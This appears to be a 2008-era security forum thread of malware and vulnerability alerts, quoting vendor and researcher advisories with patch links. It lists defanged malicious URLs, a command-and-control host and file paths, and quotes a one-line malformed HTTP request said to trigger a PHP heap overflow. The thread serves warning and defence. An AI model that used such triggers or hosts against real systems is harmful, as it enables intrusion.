Easily can happen when a visitor to ANY site enters the "names and e-mail addresses of...friends...". If you really want them to visit the site, just send them the URL yourself in an e-mail:

- http://www.techweb.com/article/printableArticle.jhtml?articleID=183702655&site_section=700028
March 24, 2006
"The Federal Trade Commission on Thursday nailed a spammer with a record-setting $900,000 fine for violating the CAN-SPAM Act. According to a complaint filed by the FTC, JumpStart Technologies of San Francisco, Calif. has spammed consumers since 2002, sending millions of messages disguised as personal e-mails in an attempt to hype its FreeFlixTix Web site. JumpStart, charged the FTC, collected e-mail addresses by offering free movie tickets to consumers in exchange for ratting out the names and e-mail addresses of five or more friends...
The spam scam also misled consumers who took the bait and went to FreeFlixTix, with some of the "free" ticket offers requiring credit card registration that in many cases resulted in charges made to the account. JumpStart's FreeFlixTix site is now offline..."

:(

Notes: As always, follow "Best practice...": Keep systems updated with all current MS patches and update/check 3rd party applications [Test here: http://secunia.com/software_inspector/ ].

Hacks -will- take advantage when users don't.


:spider:

FYI...

Malicious Flash Banner Ad - USATODAY.com
- http://securitylabs.websense.com/content/Alerts/3061.aspx
04.08.2008 - "Websense® Security Labs™ has received reports of a malicious Flash banner ad on USATODAY.com, a prominent news web site. The banner ad leads to the download of various spyware and ransomware, appearing as legit anti-virus scanners to the uninitiated... More details about this malicious binary from Microsoft:
http://www.microsoft.com/security/encyclopedia/details.aspx?name=Win32%2fRenos ..."

(Screenshots of banner ad from USATODAY at the Websense URL above.)
----------------------------

Flash Player version 9.0.124.0 released
- http://forums.spybot.info/showpost.php?p=180537&postcount=5
"...Adobe categorizes this as a -critical- update and recommends affected users upgrade to version 9.0.124.0..."

:fear::fear:

FYI...

- http://isc.sans.org/diary.html?storyid=4319
Last Updated: 2008-04-22 00:39:28 UTC - "...“Apocalyptic NEWS Usama Ben Laden” is being SPAMMED out with malicious links in it. This is an attempt to get people to load a version of Zlob. The links... are malicious. DO NOT VISIT THEM. Here is the VirusTotal report on the malware I found there: http://www.virustotal.com/analisis/a914b92b454eff25407a61fa52af9d67 ..."
[Result: 13/32 (40.62%)]

:fear:

FYI...

MySpace - Maximus root kit downloads...
- http://isc.sans.org/diary.html?storyid=4325
Last Updated: 2008-04-22 22:26:50 UTC - "...A reader, GreggS, provided a link to a myspace page with a specific friendid that has java script that popsup a transparent background gif on top of the normal user page. The transparent background gif appears to be a Automatic Update of the Microsoft Malicious Software Removal Tool. This is likely to fool a fair amount of people.
“Clicking anywhere on the page (on large css layer on top) and your browser initiates a download session from an ftp at microsofpsupports .cn and you are asked to download and/or run (no!) the file.
The "Automatic Update" (not "Windows Update") dialog is simply a gif image.
hxxp ://img404.imageshared.cn/img/20048/removaltool6gx87.gif “
This appears to be a new version of Maximus
Virustotal results here:
http://www.virustotal.com/analisis/3a29d07603a0430a74e8aa77bc81e6bb ..."
Result: 10/32 (31.25%)

- http://isc.sans.org/diary.html?storyid=4325
Last Updated: 2008-04-23 17:56:24 UTC ...(Version: 3)
"UPDATE - Thanks to Ned who pointed out that "!Maximus" is the name of the heuristic detection engine for F-Prot (and hence Authentium) rather than the name of the rootkit."

:fear:

FYI...

- http://isc.sans.org/diary.html?storyid=4346
Last Updated: 2008-04-26 18:23:13 UTC - "A new virus was submitted to us today by a friend of ours known as SPAM_Buster. The Spamvertized URL redirects to
hxxp ://www .tera .cartoes1.com/saudlov.scr
This thing had several download stages and to do a complete analysis could take a long time. Ultimately it is some type of spyware/Trojan. I will use VirusTotal and CWSandbox to analysis some of the binaries involved. Saudlov.src 12/32 “recognized” it. Virus Total Results
http://www.virustotal.com/analisis/021d7c1131b1130f35051d41dfb05370 ...
CWSandbox analysis for saudlov.scr
https://cwsandbox.org/?page=details&id=220785&password=vyagd
Interesting strings in sadlov.scr:
c:\windows\mdword.exe
hxxp ://caixa .nexenservices .com/game/game01.exe
c:\windows\mdword.exe
C:\Arquivos de programas\Internet Explorer\IEXPLORE.EXE
hxxp ://www .terra .com .br/avisolegal/
Looks like it downloads game01.exe and something from
www[dot]terra[dot]com/br/avisolegal/
So I downloaded game01.exe and ran it thru VirusTotal. 1/32 “recognized” it. F-Secure called it "Suspicious:W32/Malware/Gemini"
http://www.virustotal.com/analisis/00e6839634881c4b247c0fa98332ea95 ..."
(Further analysis available at the ISC URL above)

- http://isc.sans.org/diary.html?storyid=4343
Last Updated: 2008-04-26 13:57:49 UTC - "There is something in the air at the moment... my mail box is chock a block full of SPAM this week... On Gmail I typically get 5-10 per week, now about 500. On my own mail the anti SPAM throws away a few hundred per week, this week about 2000..."
(Long list available at the ISC URL above)

:fear::fear:

FYI...

(A weekend mess/uptick of SPAM not helping any - AV's in "catch-up" mode.)

- http://mtc.sri.com/
Most Effective Antivirus Tools Against New Malware Binaries (only "Top 10" shown...)
Sat Apr 26 17:20:29 2008
detects = Antivirus system overall detection rate based on exposure to 1752 malware binaries
rank detects missed analyzed country vendor
1st 95% 78 1752 AT Ikarus Security Software
2nd 92% 133 1752 CZ Grisoft Inc
3rd 89% 182 1752 DE Avira
4th 89% 193 1752 RO BitDefender Inc
5th 88% 208 1752 US Secure Computing
6th 87% 222 1752 IN Quick Heal Technologies
7th 83% 284 1752 NO Norman Inc
8th 82% 309 1752 FI F-Secure Corporation
9th 82% 310 1752 RU Kaspersky Lab
10th 80% 334 1752 PL GNU Open Source..."
-----^^^

More...
- http://mtc.sri.com/live_data/av_rankings/

- http://isc.sans.org/diary.html?storyid=4346
Last Updated: 2008-04-26 18:23:13 UTC

- http://isc.sans.org/diary.html?storyid=4343
Last Updated: 2008-04-26 13:57:49 UTC

- http://www.virus-radar.com/index_c168h_enu.html

:fear::fear:

FYI...

- http://isc.sans.org/diary.html?storyid=4355
Last Updated: 2008-04-29 00:13:50 UTC - "Recently one of our readers, Doug, sent us an ASF file that does something interesting: when you open it in Windows Media Player, it will immediately launch Internet Explorer which will then prompt you to download an executable file. As I don't see this every day, I went to investigate this a bit further. According to Microsoft, the ASF file format (and possibly other formats) allows creation of a script stream. The script stream can use certain, simple, script commands in Windows Media Player. This information is available at http://msdn2.microsoft.com/en-us/library/aa390699(VS.85).aspx

Now, the malicious ASF file we received opened Internet Explorer with the URL pointing to
hxxp ://www.fastmp3player.com/affiliates/772465/1/?embedded=false.
This web site had a further 302 redirect to
hxxp: //www.fastmp3player.com/affiliates/772465/1/PLAY_MP3.exe
(both links are still working), which is some adware and is reasonably detected by 20 out of 32 AV programs on VirusTotal..."

:fear:

FYI...

- http://msmvps.com/blogs/spywaresucks/archive/2008/04/28/1607314.aspx
April 28, 2008 11:52 PM sandi - "The malvertizements discovered on Yahoo are STILL there..."

- http://msmvps.com/blogs/spywaresucks/archive/2008/04/27/1605974.aspx
April 27, 2008 12:21 PM by sandi - "Yahoo aren't listening... And still the problems continue... I wonder how many hits Yahoo gets per day, and how many people are being exposed to fraudware, while these advertisements are allowed to remain online..."

(Screenshots available at the URLs above.)

:fear::fear:

FYI...

- http://isc.sans.org/diary.html?storyid=4361
Last Updated: 2008-04-30 09:27:16 UTC - "Back in November last year we published a diary about Mac DNS changer malware*. The main idea about this was to let Mac users aware that the bad guys are not ignoring this platform any more... the way it was packed showed that the attackers meant real business. All the malware did was change local DNS servers to couple of servers in a known bad network, and tell the command and control server that a new victim is ready... Only couple of anti-virus programs detected the original sample (a DMG file). This improved a bit over the time, so when I tested the sample again today on VirusTotal, 10 anti-virus programs detected it... it changes the DNS servers and reports to a C&C server. However, one thing I noticed was that the attackers started obfuscating the installation code... it was enough to fool almost *all* anti-virus programs – according to VirusTotal, this new sample was detected by only 2 (!!) AV programs... same network as before, so make sure that you are monitoring any DNS requests going there since they indicate you have infected machines on your network..."
* http://isc.sans.org/diary.html?storyid=3595
Last Updated: 2007-11-02 02:36:39 UTC ...(Version: 2) - "... This is a professional attempt at attacking Mac systems... The second thing that folks at Sunbelt noticed ( http://sunbeltblog.blogspot.com/2007/10/screenshot-of-new-mac-trojan.html ) is that when they sent a sample to VirusTotal there were 0 (zero, nada, nilch) products that detected this..."

(More detail at each URL above)

--------------------------------------
Update...

Windows-malware already exists in some ZLOB variants (fake codecs) that will attempt the DNS client hijack - one reference:
- http://ca.com/us/securityadvisor/pest/pest.aspx?id=453119651
Latest DAT Release 03 13 2008 - "This fake codec is actually a hijacker that will change your DNS settings whether you acquire your IP settings through DHCP or set your IP information manually. This hijacker will attempt to re-route all your DNS queries through 85.255.x.29 or 85.255.x.121 (RBN).... rogue DNS servers..."

-or- SpybotS&D
- http://www.safer-networking.org/en/updatehistory/2007-02-02.html
Win32.DNSChanger
- http://www.safer-networking.org/en/updatehistory/2007-03-14.html
Zlob.DNSChanger

:fear:

FYI...

PHP multiple vulns - update available
- http://secunia.com/advisories/30048/
Release Date: 2008-05-02
Critical: Moderately critical
Impact: Unknown, Security Bypass, DoS, System access
Where: From remote
Solution Status: Vendor Patch
Software: PHP 5.2.x
...The vulnerabilities are reported in versions prior to 5.2.6.
Solution: Update to version 5.2.6.
http://www.php.net/downloads.php

- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-2051
5/5/2008
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-2050
5/5/2008
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0599
5/5/2008

:fear:

FYI...

- http://www.finjan.com/MCRCblog.aspx?EntryId=1949
May 07, 2008 - "During our ongoing research we came up against one curious site. The site is hacking/security oriented, and is written in Russian (hmm... last time I've checked it was in Netherlands), and not significantly different from many other similar sites. The same "news" section with recent exploits. The same "articles" section with same "How to get root on server" paper. And the forum with common "SQL Injection FAQ" thread for newbies. What makes difference is the "download" section.... I think it's the first time (we've seen) such a comprehensive, well arranged and recently updated collection of trojans, keyloggers, back-door web-shells and, the most interesting for us, attacker toolkits..."
(Screenshots available at the URL above.)
-----------------------------------------------

- http://www.finjan.com/Pressrelease.aspx?id...=1819&lan=3
May 6, 2008 - "Finjan... today announced its discovery of a server controlled by hackers (Crimeserver) containing more than 1.4 Gigabyte of business and personal data stolen from infected PCs. The data consisted of 5,388 unique log files. Both email communications and web-related data were among them. The compromised data came from all around the world and contained information from individuals, businesses, as well as renowned organizations, including healthcare providers. To illustrate the scope; the server contained among others 571 log files from the US, 621 from Germany (DE), 322 from France (FR), 308 from India (IN), 232 from Great Britain (GB), 150 from Spain (ES), 86 from Canada (CA), 58 from Italy (IT), 46 from the Netherlands (NL), and 1,037 from Turkey (TR). Due to the sheer impact, Finjan followed its company guidelines and promptly notified over 40 major international financial institutions located in the US, Europe and India whose customers were compromised as well as various law enforcements around the world.
The report contains examples of compromised data that Finjan found on the Crimeserver, such as:
* Compromised patient data
* Compromised bank customer data
* Business-related email communications
* Captured Outlook accounts containing email communication..."

:fear::fear:

FYI...

Neosploit Updated to Include an Acrobat Exploit
- http://preview.tinyurl.com/6mlnq6
05-05-2008 (Symantec Security Response Blog) - "On about April 18th, Symantec's DeepSight honeypots began capturing a new iteration of the Neosploit exploit toolkit. It appears that the pervasive exploit kit has been updated to take advantage of a circa February 2008 vulnerability in Adobe Acrobat Professional and Reader. What makes this attack vector of particular concern is that it will work reasonably silently through most browsers. If a user is enticed to a hostile Web site (who knows which ones are hostile these days) using the browser of their choice, it is reasonably likely that their computer will become infected provided that they have Acrobat installed on their computer. Although the vulnerability has been patched since early February, I suspect that many users have not applied this patch yet. We highly recommend that if you haven’t done so, go and get the latest patched versions of Adobe Acrobat Reader and Professional from here: http://www.adobe.com/support/security/advisories/apsa08-01.html ..."

- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-2042
Last revised: 5/8/2008

Security Updates available for Adobe Reader and Acrobat 7 and 8
- http://www.adobe.com/support/security/bulletins/apsb08-13.html
"...Adobe recommends Acrobat 8 users on Windows update to Acrobat 8.1.2...
....Users with Adobe Reader 7.0 through 7.0.9, who cannot upgrade to Reader 8.1.2, should upgrade to Reader 7.1.0..."

Adobe Reader 7.1.0 released
- http://www.adobe.com/support/downloads/detail.jsp?ftpID=3952
5/7/2008 - "The Adobe® Reader® 7.1.0 update addresses a number of customer issues and security vulnerabilities..."

Release notes:
- http://kb.adobe.com/selfservice/viewContent.do?externalId=kb403541&sliceId=1

:fear:

FYI...

- http://securitylabs.websense.com/content/Alerts/3089.aspx
05.09.2008 - "Websense... has detected malicious code hosted on China.com's game site. The malware is a variant of VBS/Redlof and is known to commonly infect files with the extension of "html", "htm", "php", "jsp", "htt", "vbs", and "asp". This malicious download (MD5: e6df57ea75a77112e94036e5138bd063) is placed in a directory that appears to be reserved for game patch downloads. This virus attempts to spread itself by infecting all outbound emails sent by the victim with MS Outlook or Outlook Express. More details on the Microsoft VM ActiveX component vulnerability (MS00-075*)..."
* http://www.microsoft.com/technet/security/bulletin/MS00-075.mspx

(Screenshot available at the Websense URL.)

:fear:

FYI...

- http://preview.tinyurl.com/5zvnrx
May 9, 2008 (Avert Labs blog) - "Sometime back we had come across this interesting vulnerability posted by a Chinese researcher in his blog, claiming to have found a zero day vulnerability in php 5.2.3. We got a chance to dig a bit deeper into this and were able to reproduce the vulnerability based on the information provided in the blog. After investigation, we found that this vulnerablility affects not only verion 5.2.3 but also version 5.2.5. It is a heap overflow which can be triggered when a web server with PHP receives a malformed URI request, it can be a simple request like “GET /index.php/aa HTTP/1.1″ . Successful exploitation of this can result in arbitrary code execution with the privileges of the WEB Server... We highly recommend users to update with the latest version of PHP 5.2.6 released*. This patch besides this issue, fixes a host of other security related fixes, some of which we deem as critical..."
* http://forums.spybot.info/showpost.php?p=188217&postcount=61

- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0599
Last revised: 5/9/2008
CVSS v2 Base score: 10.0 (High)

:fear:

- http://isc.sans.org/diary.html?storyid=4421
Last Updated: 2008-05-15 23:16:38 UTC ...(Version: 3)
- http://www.us-cert.gov/current/#debian_openssl_vulnerability
May 15, 2008
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0166
Threatcon - Symantec
- http://www.symantec.com/security_response/threatconlearn.jsp
2008-05-16 05:28 - "ThreatCon is currently at Level 2: Elevated.
The ThreatCon is at level 2. Advisories have been released addressing an issue related to weak key generation in Debian and its variants, such as Ubuntu. Using a weak random number generator in the OpenSSL package, the system generates a weak key when installing services such as Secure Shell (SSH) and OpenVPN. To fix this issue, users are advised to apply available updates for the OpenSSL library and to regenerate all cryptographic keys generated previously by the library. Keys generated from GNUPG and GNUTLS packages are reportedly unaffected. Several tools are already available that allow a brute-force attack against the weak keys. H D Moore has released a database of all weak keys generated for a typical encryption key space:
( http://metasploit.com/users/hdm/tools/debian-openssl/ )
A script to brute-force the keys using that database has also been released on milw0rm by M. Mueller:
( http://www.milw0rm.com/exploits/5622 )
These tools could be used to bypass key-based login for shell services such as SSH. Other potential tools could be used to decrypt traffic such as login information or to forge digital signatures.
The Debian advisory addressing the issue provides information on how to tell if your system was using vulnerable keys. The following Debian and Ubuntu advisories are available:
DSA-1571-1 openssl -- predictable random number generator
( http://www.debian.org/security/2008/dsa-1571 )
USN-612-1: OpenSSL vulnerability
( http://www.ubuntu.com/usn/USN-612-1 ) ."

-----------

FYI...

- http://www.us-cert.gov/current/#cisco_releases_security_advisories2
May 22, 2008 - "Cisco has released three security advisories to address multiple vulnerabilities in Cisco IOS Secure Shell, Service Control Engine, and Voice Portal. These vulnerabilities may allow an attacker to take control of the affected system or cause a denial-of-service condition. US-CERT encourages users to review the following Cisco Security Advisories and apply any necessary updates or workarounds.

* Cisco IOS Secure Shell Denial of Service Vulnerabilities
- http://www.cisco.com/en/US/products/products_security_advisory09186a008099567f.shtml
* Cisco Service Control Engine Denial of Service Vulnerabilities
- http://www.cisco.com/en/US/products/products_security_advisory09186a008099bf65.shtml
* Cisco Voice Portal Privilege Escalation Vulnerability
- http://www.cisco.com/en/US/products/products_security_advisory09186a008099beae.shtml

:fear:

FYI...

- http://sunbeltblog.blogspot.com/2008/05/no-this-is-not-castlecops.html
May 22, 2008 - "No, this is not CastleCops
mezzicodec(dot)net masquerades as the legitimate CastleCops site... The site is mirroring, in near real-time, CastleCops. It seems to be primarily used for SEO purposes and possibly to steal valid user accounts, but could serve malware or exploits. Avoid this site."

- http://sunbeltblog.blogspot.com/2008/05/rash-of-fake-sites-copying-pc-world.html
May 22, 2008 - "As a follow-up to my post earlier today about a fake CastleCops page, there’s more to the story. There are other domains sharing the same IP (207.226.177.250):
pepato org
slim-cash com
spyware-wiper com
Cpaypal com
Crazycounter net
All are copying legitimate sites. Pepato is loading a fake dvdplanet.com page... These domains belong to the "Vladzone" malware gang. A while back, we believe that they were responsible for DDoS attacks against webhelper4u.com (Patrick Jordan, who works for Sunbelt) and spamhuntress.com — and maybe a few others. I would not visit these sites."

(Screenshots available at both Sunbeltblog URLs above.)

:fear::sad::mad::yuck:

FYI...

- http://secunia.com/advisories/30309/
Release Date: 2008-05-22
Critical: Highly critical
Impact: System access
Where: From remote
Solution Status: Vendor Patch
Software: IBM Lotus Sametime 7.x, IBM Lotus Sametime 8.x
...Successful exploitation may allow execution of arbitrary code.
Solution: Update to version 8.0.1 or apply hotfix ICAE-7DPP83 for Lotus Sametime 7.5.1 Cumulative Fix 1 (CF1). Contact IBM support for the patch if Sametime 7.5.1 CF1 is not deployed or if unable to update to 8.0.1.
http://preview.tinyurl.com/5s6mz9
Original Advisory:
IBM: http://www-1.ibm.com/support/docview.wss?uid=swg21303920

- http://www.us-cert.gov/current/#ibm_lotus_sametime_vulnerability
May 22, 2008

- http://isc.sans.org/diary.html?storyid=4460
Last Updated: 2008-05-26 23:54:12 UTC - "Take a look at port 1533*. That's quite an increase in targeted computers reporting via DShield over the past few days..."

* http://isc.sans.org/port.html?port=1533
"...tcp 1533 used by Lotus Sametime for chat and awareness..."

:fear:

Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.

- http://isc.sans.org/diary.html?storyid=4465
Last Updated: 2008-05-27 18:12:46 UTC ...(Version: 2) - "A vulnerability has been reported in Adobe Flash Player versions 9.0.124.0 and older, which is the current version available...
Update1: Symantec has observed that this issue is being actively exploited in the wild and have elevated their ThreatCon*.
Update2: A SecurityFocus article is now live here**."

ThreatCon is currently at Level 2: Elevated
* http://www.symantec.com/security_response/threatconlearn.jsp
"The DeepSight ThreatCon is being raised to Level 2 in response to the discovery of in-the-wild exploitation of an unspecified and unpatched vulnerability affecting Adobe Flash Player. The flaw occurs when processing a malicious SWF file. At the time of writing, details related to this vulnerability are scarce, but Symantec Security Response has been able to trigger the flaw in some scenarios. We're currently investigating the vulnerability to uncover additional details, including the sites used to host the attack... Currently two Chinese sites are known to be hosting exploits for this flaw: wuqing17173 .cn and woai117 .cn. The sites appear to be exploiting the same flaw, but are using different payloads... Network administrators are advised to blacklist these domains to prevent clients from inadvertently being redirected to them. Further analysis into these attacks, specifically the woai117 .cn attack, uncovered another domain involved dota11 .cn . We have discovered that this site is being actively injected into sites through what is likely SQL injection vulnerabilities. A google search reports approximately 20,000 web pages (not necessarily distinct servers or domains) injected with a script redirecting users to this malicious site..."

** http://www.securityfocus.com/bid/29386

Malicious swf files?
- http://isc.sans.org/diary.html?storyid=4468
Last Updated: 2008-05-27 18:46:44 UTC ...(Version: 2) - "...potentially malicious site found at hxxp ://www .play0nlnie .com/pcd/topics/ff11us/20080311cPxl31/07.jpg
The JPG file is actually a script... Unknown at this time if these SWF files are related to this vulnerability."

:fear:

FYI...

- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080527
May 27, 2008 - 11:16 PM - "...important that you make sure you have updated your Adobe Flash Player to the latest version* (9.0.124.0 at the time of this writing)... it seems that several websites are now taking advantage of a flaw in the Adobe Flash Player previously covered by CVE-2007-0071**. It appears that Symantec started noticing this activity being exploited in the wild and initially labeled it a 0-day threat as they thought it affected 9.0.124.0. However, they have since posted an update*** potentially changing this view. Both Symantec and the Internet Storm Center have posted information surrounding the vulnerability and some of the websites that are actively exploiting it. It would appear this is in fact fully patched with the latest version and is the same vulnerability described by CVE-2007-0071. We decided to look into this a bit more and see what other websites are out there exploited this vulnerability and what they attempted to install. It did not take us long to find several other websites beyond those already mentioned. It would appear that this exploit has been pretty widely known within the Chinese community for the past two days or so... Did we mention that you should UPGRADE YOUR FLASH PLAYER (if you haven't already)? It's always a good idea to keep your software up-to-date, but it should surely be a priority to do so now..."

* http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash

** http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-0071
Last revised: 4/25/2008 - "...Adobe Flash Player 9.0.115.0 and earlier..."

*** http://www.symantec.com/security_response/threatcon/index.jsp

- http://blogs.adobe.com/psirt/2008/05/potential_flash_player_issue_u_1.html
May 28, 2008 11:09AM - "...This exploit does NOT appear to include a new, unpatched vulnerability as has been reported elsewhere – customers with Flash Player 9.0.124.0 should not be vulnerable to this exploit. We’re still looking in to the exploit files, and will update everyone with further information as we get it, but for now, we strongly encourage everyone to download and install the latest Flash Player update, 9.0.124.0*..."
* http://www.adobe.com/go/getflashplayer

---------------

Retired: Adobe Flash Player SWF File Remote Code Execution Vulnerability
- http://www.securityfocus.com/bid/29386/discuss
Updated: May 28 2008 07:53PM - "...Further research indicates that this vulnerability is the same issue described in BID 28695** (Adobe Flash Player Multimedia File Remote Buffer Overflow Vulnerability), so this BID is being retired."

** http://www.securityfocus.com/bid/28695/solution
"...The vendor released Flash Player 9.0.124.0 to address this issue..."

FYI...

- http://securitylabs.websense.com/content/Alerts/3096.aspx
05.29.2008 - "Websense... has detected thousands of web sites infected with the recent mass JavaScript injection that exploits a vulnerability in Adobe Flash (CVE-2007-0071*) to deliver its malicious payload... This vulnerability is not a 0-day and users with the latest version of Flash Player (version 9.0.124.0) are safe. However, there are still many on older versions of Flash that are unaware of this mass web infection and are susceptible to this drive-by attack. An update to the latest version of Flash Player is highly recommended**.
Websense ThreatSeeker has been tracking these malicious web sites and have discovered numerous reputable web sites that are now unwilling participants, infecting their very own visitors. These sites are from various industries such as government, education, healthcare, finance, media, and entertainment. This attack also attempts to exploit other popular vulnerabilities such as MDAC, RealPlayer, and various ActiveX controls... drive-by threat... site screenshots from: Microsoft, Dept. of Education (Australia), PBS, Durex, CDC (Centers for Disease Control and Prevention), Discovery Channel, various universities and a Pakistani district government."

* http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-0071
Last revised: 4/25/2008 - "...Adobe Flash Player 9.0.115.0 and earlier..."

** http://www.adobe.com/go/getflashplayer

(Screenshots available at the Websense URL above.)

:fear:

FYI...

DHS PDF
- http://www.f-secure.com/weblog/archives/00001449.html
June 1, 2008 - "...The only information we have on this 130kB sample is that it was named f1be1cdea0bcc5a1574a10771cd4e8e8.pdf (after it's MD5 hash) and that it was submitted on the 23rd of May. 'Looks like a Department of Homeland Security form G-325A.
Look again. What's the filename? It's -not- f1be1cdea0bcc5a1574a10771cd4e8e8.pdf. It's 0521.pdf. This is -not- the document we opened. So what happens here? Apparently this PDF has been used in a targeted attack against an unknown target. When this PDF is opened in Acrobat Reader, it uses a known exploit to to drop files. Specifically, it creates two files in the TEMP folder: D50E.tmp.exe and 0521.pdf. Then it executes the EXE and launches the clean 0521.pdf file to Adobe Reader in order to fool the user that everything is all right. D50E.tmp.exe is a backdoor that creates lots of new files with innocent-sounding filenames, including:
\windows\system32\avifil16.dll
\windows\system32\avifil64.dll
\windows\system32\drivers\pcictrl.sys
\windows\system32\drivers\Nullbak.dat
\windows\system32\drivers\Beepbak.dat
The SYS component is a -rootkit- that tries to hide all this activity on the infected machine. The backdoor tries to connect to port 80 of a host called nbsstt .3322 .org. Anybody operating this machine would have full access to the infected machine. Well, 3322 .org is one of the well-known Chinese DNS-bouncers that we see a lot in targeted attacks. Does nbsstt mean something? Beats me, but Google will find a user with this nickname posting to several Chinese military-related web forums, such as bbs .cjdby .net. Where does nbsstt .3322 .org point to? IP address 125.116.97.19 is in Zhejiang, China. And it's live right now, answering requests at port 80."

(Screenshots available at the URL above.)

:fear:

FYI...

- http://www.skype.com/security/skype-sb-2008-003.html
Impact: Exploitation of this issue allows an attacker to execute arbitrary code on the targeted victim's machine. An attacker would need to construct a malicious file: URI and send it to the intended victim. Upon clicking the link execution of arbitrary code on the victim's machine will be possible.
Affected software: ...The following Skype clients are vulnerable to this attack:
Skype for Windows: All releases prior to and including 3.8.*.115
Solution: Skype has fixed the vulnerability in version 3.8.0.139
Download:
x86 platform, Microsoft Windows 2000 or Microsoft Windows XP: http://www.skype.com/download/skype/windows/
x86 platform, Linux: http://www.skype.com/download/skype/linux/
PPC and x86 platforms, Mac OS X v10.3.9 or later: http://www.skype.com/download/skype/macosx/
Pocket PC platform, Microsoft Windows Mobile 2003: http://www.skype.com/download/skype/pocketpc/

> http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1805
Original release date: 6/6/2008

:fear:

FYI...

Security Update available for Adobe Reader and Acrobat 8.1.2
- http://www.adobe.com/support/security/bulletins/apsb08-15.html
Release date: June 23, 2008
Vulnerability identifier: APSB08-15
CVE number: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2641
Platform: All platforms
Affected software versions:
* Adobe Reader 8.0 through 8.1.2
* Adobe Reader 7.0.9 and earlier
* Adobe Acrobat Professional, 3D and Standard 8.0 through 8.1.2
* Adobe Acrobat Professional, 3D and Standard 7.0.9 and earlier
NOTE: Adobe Reader 7.1.0 and Acrobat 7.1.0 are not vulnerable to this issue. Adobe Reader 9 and Acrobat 9, expected to be available by July 2008, are also not vulnerable to this issue.

Summary:
A critical vulnerability has been identified in Adobe Reader and Acrobat 8.1.2. This vulnerability would cause the application to crash and could potentially allow an attacker to take control of the affected system.
Adobe recommends users of Acrobat 8 and Adobe Reader install the 8.1.2 Security Update 1 patch.

Solution:
Acrobat 8 and Adobe Reader: Adobe recommends Adobe Reader 8 users update to Adobe Reader 8.1.2 Security Update 1, available at the links below:
For Windows: http://www.adobe.com/support/downloads/detail.jsp?ftpID=3967
For Macintosh: http://www.adobe.com/support/downloads/detail.jsp?ftpID=3966
Adobe recommends Acrobat 8 users on Windows update to Acrobat 8.1.2 Security Update 1, available here: http://www.adobe.com/support/downloads/detail.jsp?ftpID=3976
Adobe recommends Acrobat 8 users on Macintosh update to Acrobat 8.1.2 Security Update 1, available here: http://www.adobe.com/support/downloads/detail.jsp?ftpID=3977
Adobe recommends Acrobat 3D Version 8 users on Windows update to Acrobat 3D Version 8.1.2 Security Update 1, available here: http://www.adobe.com/support/downloads/detail.jsp?ftpID=3975
Users with Adobe Reader 7.0 through 7.0.9 should upgrade to Adobe Reader 7.1.0: http://www.adobe.com/go/getreader.
Acrobat 7
Adobe recommends Acrobat 7 users on Windows update to Acrobat 7.1.0, available here: http://www.adobe.com/support/downloads/product.jsp?product=1&platform=Windows
Adobe recommends Acrobat 7 users on Macintosh update to Acrobat 7.1.0, available here: http://www.adobe.com/support/downloads/product.jsp?product=1&platform=Macintosh

Severity rating:
Adobe categorizes this as an critical issue and recommends affected users update their installations...
NOTE: there are reports that this issue is being exploited in the wild..."

- http://blog.trendmicro.com/pdf-exploit-causes-bsod/
June 25, 2008 - "...According to the Adobe Security Bulletin on this issue*, the vulnerability exists in Adobe Reader 7.0.9 and earlier versions, 8.0 to 8.1.2, and in Adobe Acrobat 7.0.9 and earlier versions, 8.0 to 8.1.2... As of the most recent testing, TROJ_PIDIEF.AC is observed to download an info-stealer (mostly monitoring and gathering information about running processes, installed programs and system information) and a spammer which connects the compromised PC to a botnet. The common danger faced by users who encounter downloaders: you never really know what you’re going to get. Since malware writers have continuous access to the URL, they can update the downloaded file with different or more damaging payloads..."
* http://www.adobe.com/support/security/bulletins/apsb08-15.html
---

Adobe Reader patch, now you see it, now you don't
- http://news.cnet.com/8301-13554_3-9979638-33.html
June 27, 2008

:fear:

FYI...

- http://blogs.zdnet.com/security/?p=1356
June 26, 2008 - "What happens when the official domain names of the organizations that issue the domain names in general, and provide all the practical guidance on how (to) prevent DNS hijacking, end up having their own domain names hijacked? A wake up call for the Internet community. The official domains of ICANN, the Internet Corporation for Assigned Names and Numbers, and IANA, the Internet Assigned Numbers Authority were hijacked earlier today... NetDevilz left the following message on all of the domains:
“You think that you control the domains but you don’t! Everybody knows wrong. We control the domains including ICANN! Don’t you believe us? haha ... (Lovable Turkish hackers group)”..."
- http://www.zone-h.org/content/view/14973/30/
27 June 2008 - "...Hijacked domains include "icann.com", "icann.net", "iana.com" and "iana-servers.com". We reached the defacers by email but they refused to tell us how they changed the DNS records, however a cross-site scripting or cross-site request forgery vulnerability might have been exploited..."

(Screenshots available at the ZDnet URL above.)

:fear::spider::fear:

FYI...

- http://www.securityfocus.com/news/11526
2008-07-08 - "...The CERT vulnerability note* describing the issue lists more than 90 software developers and network equipment vendors that may be affected by the issue...Internet service providers and companies each received the fix on Tuesday... The goal: To have every major service provider and company apply their software patches in 30 days..."

* U.S.CERT: http://www.kb.cert.org/vuls/id/800113

- http://isc.sans.org/diary.html?storyid=4687
Last Updated: 2008-07-08 23:09:39 UTC ...(Version: 4)

Microsoft MS08-037: http://www.microsoft.com/technet/security/Bulletin/MS08-037.mspx
Internet Software Consortium (BIND): http://www.isc.org/sw/bind/bind-security.php ...

DNSSEC Overview: http://www.dnssec.org
DNSSEC Deployment Initiative: http://www.dnssec-deployment.org
DNSSEC HowTo: http://www.nlnetlabs.nl/dnssec_howto

- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1447
7/8/2008
- http://www.us-cert.gov/cas/techalerts/TA08-190B.html
7/8/2008

DNS Checker:
- http://www.doxpara.com/?p=1162
Dan Kaminsky - July 9, 2008

:fear:

FYI...

* http://download.zonealarm.com/bin/free/pressReleases/2008/LossOfInternetAccessIssue.html
Last Revised: 9 July 2008
